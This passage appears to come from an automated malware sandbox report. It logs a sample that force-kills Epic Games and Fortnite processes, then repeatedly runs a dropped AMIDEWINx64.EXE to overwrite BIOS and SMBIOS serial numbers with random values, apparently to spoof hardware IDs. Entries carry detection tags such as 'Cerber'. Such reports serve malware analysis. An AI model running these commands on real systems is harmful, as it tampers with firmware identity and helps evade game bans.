    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c TASKKILL /F /IM EpicGamesLauncher.exe 2>NULL
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1836
- - C:\Windows\system32\taskkill.exe
    TASKKILL /F /IM EpicGamesLauncher.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c TASKKILL /F /IM FortniteClient-Win64-Shipping.exe 2>NULL
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4356
- - C:\Windows\system32\taskkill.exe
    TASKKILL /F /IM FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IVN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IVN 1919712622026
    3⤵
    PID:1392
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IVN 1919712622026
      4⤵
      Cerber
      Executes dropped EXE
      PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3548
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IV 1919712622026
    3⤵
    PID:4668
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IV 1919712622026
      4⤵
      Executes dropped EXE
      PID:4652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1032
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IV 1919712622026
    3⤵
    PID:3648
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IV 1919712622026
      4⤵
      Cerber
      Executes dropped EXE
      PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3632
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SM 19201108747123
    3⤵
    PID:3292
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SM 19201108747123
      4⤵
      Cerber
      Executes dropped EXE
      PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SP %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3268
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SP 19201108747123
    3⤵
    PID:4060
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SP 19201108747123
      4⤵
      Cerber
      Executes dropped EXE
      PID:2076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1028
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SV 19201108747123
    3⤵
    PID:5048
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SV 19201108747123
      4⤵
      Cerber
      Executes dropped EXE
      PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3248
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SS 19201108747123
    3⤵
    PID:908
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SS 19201108747123
      4⤵
      Executes dropped EXE
      PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SU AUTO > nul
  2⤵
  PID:548
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SU AUTO
    3⤵
    PID:1784
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SU AUTO
      4⤵
      Cerber
      Executes dropped EXE
      PID:4952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SK %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2808
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SK 19201108747123
    3⤵
    PID:1476
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SK 19201108747123
      4⤵
      Cerber
      Executes dropped EXE
      PID:796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SF %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2316
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SF 192042162324987
    3⤵
    PID:3500
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SF 192042162324987
      4⤵
      Executes dropped EXE
      PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2152
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BM 192042162324987
    3⤵
    PID:1232
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BM 192042162324987
      4⤵
      Cerber
      Executes dropped EXE
      PID:3064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BP %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4792
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BP 192042162324987
    3⤵
    PID:2888
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BP 192042162324987
      4⤵
      Cerber
      Executes dropped EXE
      PID:2828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:5032
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BV 192073237110083
    3⤵
    PID:2628
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BV 192073237110083
      4⤵
      Cerber
      Executes dropped EXE
      PID:3024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3424
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BS 192073237110083
    3⤵
    PID:3996
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BS 192073237110083
      4⤵
      Cerber
      Executes dropped EXE
      PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BT %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3516
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BT 192073237110083
    3⤵
    PID:2020
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BT 192073237110083
      4⤵
      Cerber
      Executes dropped EXE
      PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BLC %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4272
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BLC 192073237110083
    3⤵
    PID:516
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BLC 192073237110083
      4⤵
      Cerber
      Executes dropped EXE
      PID:2448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4688
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CM 192111035227947
    3⤵
    PID:1156
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CM 192111035227947
      4⤵
      Cerber
      Executes dropped EXE
      PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:848
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CV 192111035227947
    3⤵
    PID:3552
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CV 192111035227947
      4⤵
      Executes dropped EXE
      PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1684
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CS 192111035227947
    3⤵
    PID:5020
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CS 192111035227947
      4⤵
      Cerber
      Executes dropped EXE
      PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CA %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1100
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CA 192111035227947
    3⤵
    PID:1836
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CA 192111035227947
      4⤵
      Cerber
      Executes dropped EXE
      PID:816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CSK %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4868
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CSK 192142110013043
    3⤵
    PID:624
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CSK 192142110013043
      4⤵
      Cerber
      Executes dropped EXE
      PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PSN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1996
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PSN 192142110013043
    3⤵
    PID:4640
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PSN 192142110013043
      4⤵
      Cerber
      Executes dropped EXE
      PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PAT %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4732
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PAT 192142110013043
    3⤵
    PID:2676
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PAT 192142110013043
      4⤵
      Cerber
      Executes dropped EXE
      PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PPN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3664
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PPN 192142110013043
    3⤵
    PID:1948
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PPN 192142110013043
      4⤵
      Cerber
      Executes dropped EXE
      PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IVN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3488
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IVN 192142110013043
    3⤵
    PID:540
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IVN 192142110013043
      4⤵
      Cerber
      Executes dropped EXE
      PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:856
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IV 192173184830908
    3⤵
    PID:1616
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IV 192173184830908
      4⤵
      Cerber
      Executes dropped EXE
      PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4800
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IV 192173184830908
    3⤵
    PID:4552
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IV 192173184830908
      4⤵
      Cerber
      Executes dropped EXE
      PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2796
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SM 192173184830908
    3⤵
    PID:4520
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SM 192173184830908
      4⤵
      Cerber
      Executes dropped EXE
      PID:3320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SP %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2488
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SP 192173184830908
    3⤵
    PID:2724
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SP 192173184830908
      4⤵
      Cerber
      Executes dropped EXE
      PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4648
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SV 19220982916004
    3⤵
    PID:3560
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SV 19220982916004
      4⤵
      Cerber
      Executes dropped EXE
      PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4560
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SS 19220982916004
    3⤵
    PID:1396
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SS 19220982916004
      4⤵
      Cerber
      Executes dropped EXE
      PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SU AUTO > nul
  2⤵
  PID:3676
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SU AUTO
    3⤵
    PID:644
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SU AUTO
      4⤵
      Cerber
      Executes dropped EXE
      PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SK %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3120
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SK 19220982916004
    3⤵
    PID:1852
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SK 19220982916004
      4⤵
      Cerber
      Executes dropped EXE
      PID:4368
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SF %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:820
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SF 19224205771100
    3⤵
    PID:2472
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SF 19224205771100
      4⤵
      Cerber
      Executes dropped EXE
      PID:3452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4824
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BM 19224205771100
    3⤵
    PID:1700
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BM 19224205771100
      4⤵
      Executes dropped EXE
      PID:1412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BP %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3988
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BP 19224205771100
    3⤵
    PID:3356
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BP 19224205771100
      4⤵
      Cerber
      Executes dropped EXE
      PID:2388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3428
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BV 19224205771100
    3⤵
    PID:3440
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BV 19224205771100
      4⤵
      Cerber
      Executes dropped EXE
      PID:3500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3600
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BS 19224205771100
    3⤵
    PID:2220
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BS 19224205771100
      4⤵
      Executes dropped EXE
      PID:1976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BT %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4416
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BT 192273132618964
    3⤵
    PID:4304
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BT 192273132618964
      4⤵
      Cerber
      Executes dropped EXE
      PID:2784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /BLC %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4296
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /BLC 192273132618964
    3⤵
    PID:4760
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /BLC 192273132618964
      4⤵
      Cerber
      Executes dropped EXE
      PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4916
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CM 192273132618964
    3⤵
    PID:2624
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CM 192273132618964
      4⤵
      Cerber
      Executes dropped EXE
      PID:3220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4276
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CV 1923093064060
    3⤵
    PID:3068
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CV 1923093064060
      4⤵
      Cerber
      Executes dropped EXE
      PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4656
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CS 1923093064060
    3⤵
    PID:1124
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CS 1923093064060
      4⤵
      Cerber
      Executes dropped EXE
      PID:1236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CA %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4968
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CA 1923093064060
    3⤵
    PID:3536
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CA 1923093064060
      4⤵
      Cerber
      Executes dropped EXE
      PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /CSK %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:656
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /CSK 1923093064060
    3⤵
    PID:4300
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /CSK 1923093064060
      4⤵
      Cerber
      Executes dropped EXE
      PID:3792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PSN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3616
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PSN 1923093064060
    3⤵
    PID:4468
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PSN 1923093064060
      4⤵
      Executes dropped EXE
      PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PAT %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2884
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PAT 192332005421924
    3⤵
    PID:3680
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PAT 192332005421924
      4⤵
      Cerber
      Executes dropped EXE
      PID:3612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /PPN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:3552
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /PPN 192332005421924
    3⤵
    PID:848
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /PPN 192332005421924
      4⤵
      Executes dropped EXE
      PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IVN %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:5020
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IVN 192332005421924
    3⤵
    PID:1684
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IVN 192332005421924
      4⤵
      Cerber
      Executes dropped EXE
      PID:4204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1836
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IV 192332005421924
    3⤵
    PID:1100
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IV 192332005421924
      4⤵
      Cerber
      Executes dropped EXE
      PID:4320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /IV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:624
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /IV 19237308037021
    3⤵
    PID:4868
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /IV 19237308037021
      4⤵
      Executes dropped EXE
      PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SM %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:4640
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SM 19237308037021
    3⤵
    PID:1996
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SM 19237308037021
      4⤵
      Cerber
      Executes dropped EXE
      PID:2540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SP %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:2676
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SP 19237308037021
    3⤵
    PID:4732
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SP 19237308037021
      4⤵
      Cerber
      Executes dropped EXE
      PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SV %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:1948
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SV 19237308037021
    3⤵
    PID:3664
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SV 19237308037021
      4⤵
      Cerber
      Executes dropped EXE
      PID:668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SS %RANDOM%%RANDOM%%RANDOM% > nul
  2⤵
  PID:540
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SS 19237308037021
    3⤵
    PID:3488
  - - C:\Windows\AMIDEWINx64.EXE
      C:\Windows\AMIDEWINx64.EXE /SS 19237308037021
      4⤵
      Cerber
      Executes dropped EXE
      PID:4524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /C C:\Windows\AMIDEWINx64.EXE /SU AUTO > nul
  2⤵
  PID:952
- - C:\Windows\system32\cmd.exe
    cmd /C C:\Windows\AMIDEWINx64.EXE /SU AUTO
    3⤵
